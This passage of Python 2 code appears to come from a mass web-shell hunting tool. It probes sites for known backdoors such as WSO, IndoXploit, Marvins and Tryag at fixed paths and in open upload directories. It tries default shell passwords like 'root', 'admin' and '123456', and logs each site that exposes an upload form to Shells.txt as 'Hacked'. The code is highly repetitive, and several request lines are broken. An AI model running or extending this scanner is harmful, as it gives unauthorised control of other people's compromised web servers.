if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[Gaukingo]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[Gaukingo]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[Gaukingo]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[Gaukingo]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[Gaukingo]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[Gaukingo]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[Gaukingo]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[Gaukingo]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[Gaukingo]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[Gaukingo]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[Gaukingo]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[Gaukingo]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[Gaukingo]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[Gaukingo]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
elif ' name=pass' in requests.get(SH5,timeout=15).content :
nhzgrf_ScreenLayout =,data=password_nhzgrf,timeout=15).content
if 'WSO' in nhzgrf_ScreenLayout :
print ' -| '+site +'/ --> {}[ScreenLayout]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
elif ' name=pass' in requests.get(SH8,timeout=15).content :
proot_Ajax =,data=password_root,timeout=15).content
if 'WSO' in proot_Ajax :
print ' -| '+site +'/ --> {}[Ajax]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
elif 'Tryag File Manager' in requests.get(SH10,timeout=15).content :
print ' -| '+site +'/ --> {}[Tryag]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'config root man' in requests.get(SH11,timeout=15).content :
print ' -| '+site +'/ --> {}[Marvins]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'Windows' in wso_check and 'Upload file:' in wso_check :
print ' -| '+site +'/ --> {}[WSO]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'Tryag File Manager' in requests.get(SH20,timeout=15).content :
print ' -| '+site +'/ --> {}[CssReadySel]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'Tryag File Manager' in requests.get(SH21,timeout=15).content :
print ' -| '+site +'/ --> {}[CssReady]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif '<title>Legion</title>' in requests.get(SH22,timeout=15).content :
print ' -| '+site +'/ --> {}[Legion]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
except :
print ' -| '+site +' --> {}[Failed]'.format(fr)
def Other(site):
try :
site = URL(site)
SH1_O = site+'/olux.php'
SH2_O = site+'/indoxploit.php'
SH3_O = site+'/Marvins.php'
SH4_O = site+'/wso.php'
SH5_O = site+'/images/'
SH6_O = site+'/uploads/'
SH7_O = site+'/img/'
SH8_O = site+'/upload/'
SH9_O = site+'/gallery/'
SH10_O = site+'/files/'
SH11_O = site+'/pdf/'
SH12_O = site+'/docs/'
SH13_O = site+'/up.php'
SH14_O = site+'/upload.php'
SH15_O = site+'/shell.php'
password_nhzgrf = {'pass':'nhzgrf'}
password_root = {'pass':'root'}
password_r00t = {'pass':'r00t'}
password_admin = {'pass':'admin'}
password_t00r = {'pass':'t00r'}
password_123 = {'pass':'123'}
password_1234 = {'pass':'1234'}
password_12345 = {'pass':'12345'}
password_123456 = {'pass':'123456'}
password_123123 = {'pass':'123123'}
password_123321 = {'pass':'123321'}
password_123456789 = {'pass':'123456789'}
password_1234567890 = {'pass':'1234567890'}
password_haurgeulis = {'pass':'haurgeulis'}
password_rehan = {'password':'rehan'}
pattern_php = re.compile('<a href="(.*).php">')
if 'WSO 2.6' in requests.get(SH1_O,timeout=15).content :
print ' -| '+site +'/ --> {}[Olux]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif '<title>IndoXploit</title>' in requests.get(SH2_O,timeout=15).content :
print ' -| '+site +'/ --> {}[IndoXploit]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif '<title>IndoXploit</title>' in requests.get(SH2_O,timeout=15).content :
print ' -| '+site +'/ --> {}[IndoXploit]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
wso_check = requests.get(SH4_O,timeout=15).content
if 'Windows' in wso_check and 'Upload file:' in wso_check :
print ' -| '+site +'/ --> {}[WSO]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
images_check = requests.get(SH5_O,timeout=15).content
if 'Index of' in images_check and '.php' in images_check :
shells = []
if re.findall(pattern_php,images_check):
shells = re.findall(pattern_php,images_check)
for shell in shells:
sh_check = requests.get(SH5_O+shell+'.php',timeout=15).content
if ' type="file"' in sh_check or ' type=\'file\'' in sh_check or ' type= "file"' in sh_check or ' type= \'file\'' in sh_check or ' type = "file"' in sh_check or ' type = \'file\'' in sh_check or ' type ="file"' in sh_check or ' type =\'file\'' in sh_check or ' type=file' in sh_check or ' type =file' in sh_check or ' type= file' in sh_check or ' type = file' in sh_check or 'Upload</a> ]</li><li>[' in sh_check or 'upload</a><li><a>Sym' in sh_check :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in sh_check :
nhzgrf ='.php',data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot ='.php',data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t ='.php',data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin ='.php',data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r ='.php',data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 ='.php',data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 ='.php',data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 ='.php',data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 ='.php',data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 ='.php',data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 ='.php',data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 ='.php',data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 ='.php',data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis ='.php',data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
uploads_check = requests.get(SH6_O,timeout=15).content
if 'Index of' in uploads_check and '.php' in uploads_check :
shells = []
if re.findall(pattern_php,uploads_check):
shells = re.findall(pattern_php,uploads_check)
for shell in shells:
sh_check = requests.get(SH6_O+shell+'.php',timeout=15).content
if ' type="file"' in sh_check or ' type=\'file\'' in sh_check or ' type= "file"' in sh_check or ' type= \'file\'' in sh_check or ' type = "file"' in sh_check or ' type = \'file\'' in sh_check or ' type ="file"' in sh_check or ' type =\'file\'' in sh_check or ' type=file' in sh_check or ' type =file' in sh_check or ' type= file' in sh_check or ' type = file' in sh_check or 'Upload</a> ]</li><li>[' in sh_check or 'upload</a><li><a>Sym' in sh_check :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in sh_check :
nhzgrf ='.php',data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot ='.php',data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t ='.php',data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin ='.php',data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r ='.php',data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 ='.php',data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 ='.php',data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 ='.php',data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 ='.php',data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 ='.php',data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 ='.php',data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 ='.php',data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 ='.php',data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis ='.php',data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
img_check = requests.get(SH7_O,timeout=15).content
if 'Index of' in img_check and '.php' in img_check :
shells = []
if re.findall(pattern_php,img_check):
shells = re.findall(pattern_php,img_check)
for shell in shells:
sh_check = requests.get(SH7_O+shell+'.php',timeout=15).content
if ' type="file"' in sh_check or ' type=\'file\'' in sh_check or ' type= "file"' in sh_check or ' type= \'file\'' in sh_check or ' type = "file"' in sh_check or ' type = \'file\'' in sh_check or ' type ="file"' in sh_check or ' type =\'file\'' in sh_check or ' type=file' in sh_check or ' type =file' in sh_check or ' type= file' in sh_check or ' type = file' in sh_check or 'Upload</a> ]</li><li>[' in sh_check or 'upload</a><li><a>Sym' in sh_check :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in sh_check :
nhzgrf ='.php',data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot ='.php',data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t ='.php',data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin ='.php',data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r ='.php',data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 ='.php',data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 ='.php',data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 ='.php',data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 ='.php',data=password_123456,timeout=15).content
